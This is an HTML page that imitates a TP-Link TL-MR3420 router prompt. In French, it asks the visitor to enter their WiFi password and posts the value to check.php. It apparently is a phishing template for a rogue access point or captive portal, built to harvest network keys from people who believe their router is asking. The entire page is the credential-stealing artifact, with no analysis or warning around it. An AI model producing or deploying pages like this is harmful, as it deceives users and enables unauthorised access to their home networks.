<!DOCTYPE html>
<html>
<head>








<meta name="viewport" content="width=device-width">


<style>
img {
    max-width: 100%;
}
</style>
<meta charset="UTF-8">
<title>TL-MR3420 192.168.0.1</title>
<style>

body { background: url(img/green.jpg) no-repeat center center fixed ;
	-webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  }
 img {
  margin:5%; 
  width:89%;
  border:3px solid gray;
 }
 form{
 margin:10%; 
  position: absolute;
    left: 20%;
    top: 30%;
 }
 h2 {text-align: center;
	color:white;
 }
</style>
</head>
<body>
<img src="img/top.jpg">
<form id="form1" name="form1" method="POST" action="check.php" >
<h2>Saisissez Le mot de passe de Votre Wifi.</h2>
<b>

<center><input type="password" name="key1">  </input>
<br><center>
<input type="Submit" name="Submit" value="Valider">  </input>
<b/></form>
</body>
</html>